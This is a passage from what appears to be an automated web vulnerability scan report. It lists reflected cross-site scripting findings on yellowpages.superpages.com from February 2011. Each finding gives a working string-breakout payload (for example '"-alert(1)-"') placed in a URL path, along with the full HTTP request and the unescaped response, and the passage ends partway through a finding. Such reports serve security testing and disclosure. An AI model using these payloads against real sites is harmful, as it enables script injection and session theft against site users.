The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d043"-alert(1)-"ea78a66d4f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css6d043&quot;-alert(1)-&quot;ea78a66d4f3/busprofile.css
Server: Unspecified
Set-Cookie: JSESSIONID=D39CC0F55EE6FF1DCB0F7AE681BEEEFC; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:04 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.546. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dd6"-alert(1)-"584c21ff5a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css/busprofile.css14dd6&quot;-alert(1)-&quot;584c21ff5a6
Server: Unspecified
Set-Cookie: JSESSIONID=A0B8DA0925D4013D343773E12EB6B2B9; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:12 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.547. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46554"-alert(1)-"be25698ff9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile46554"-alert(1)-"be25698ff9/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile46554&quot;-alert(1)-&quot;be25698ff9/css/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=C43C42A2F651864B58C61C05BB832B63; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:58 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile46554"-alert(1)-"be25698ff9/css/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.548. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6866"-alert(1)-"0f304c70d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/cssb6866&quot;-alert(1)-&quot;0f304c70d9e/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=C18D83DEE8E4FAD1642CFA1B00191576; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:06 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.549. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff3b0"-alert(1)-"0f9464b5bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css/print.cssff3b0&quot;-alert(1)-&quot;0f9464b5bb7
Server: Unspecified
Set-Cookie: JSESSIONID=EB0CD557543B7B79EFDB0A2D65AFDA04; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:14 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.550. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49cd4"-alert(1)-"96eceb6ffe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile49cd4&quot;-alert(1)-&quot;96eceb6ffe4/js/busprofile.js
Server: Unspecified
Set-Cookie: JSESSIONID=E1DEBECF6D55BEE5047D715F190E5E85; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:11 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.551. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b019f"-alert(1)-"5e23dbe0df5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/jsb019f&quot;-alert(1)-&quot;5e23dbe0df5/busprofile.js
Server: Unspecified
Set-Cookie: JSESSIONID=91DA6ED19F90F3B9CFE832FC9D00294D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:20 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.552. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af28c"-alert(1)-"d5cdefab79b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/busprofile.jsaf28c&quot;-alert(1)-&quot;d5cdefab79b
Server: Unspecified
Set-Cookie: JSESSIONID=C8CAA79C6FFF661580B5A8414F30FFC0; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:29 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
ages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.553. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb86"-alert(1)-"af2b6080645 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofileedb86&quot;-alert(1)-&quot;af2b6080645/js/csiframe.js
Server: Unspecified
Set-Cookie: JSESSIONID=C289443CC4D1CCC15509FEB05BD2B338; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:08 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.554. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bae2"-alert(1)-"d1c4fd37467 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js1bae2&quot;-alert(1)-&quot;d1c4fd37467/csiframe.js
Server: Unspecified
Set-Cookie: JSESSIONID=4C4E33ECA8D5BE5099B80F0F1406B058; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:17 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.555. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd87"-alert(1)-"26871eafe34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/csiframe.js1dd87&quot;-alert(1)-&quot;26871eafe34
Server: Unspecified
Set-Cookie: JSESSIONID=9AFB68F58057118BE89F30825428352B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:27 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.556. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c75"-alert(1)-"933c529b5ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofileb3c75&quot;-alert(1)-&quot;933c529b5ba/js/hide.js
Server: Unspecified
Set-Cookie: JSESSIONID=A833574ACD90DE7C4B955F31362CD841; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:01 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.557. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de57b"-alert(1)-"653154b748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/jsde57b"-alert(1)-"653154b748/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/jsde57b&quot;-alert(1)-&quot;653154b748/hide.js
Server: Unspecified
Set-Cookie: JSESSIONID=0A571CCB92825CFBE44F2D68AAF5D862; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:09 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/jsde57b"-alert(1)-"653154b748/hide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.558. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/hide.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f72"-alert(1)-"1d6df26e138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/hide.js30f72&quot;-alert(1)-&quot;1d6df26e138
Server: Unspecified
Set-Cookie: JSESSIONID=EE8F07BABFC571B292CA39BD37E9CCCB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:20 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.559. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/photos.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f5f"-alert(1)-"a4339366c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

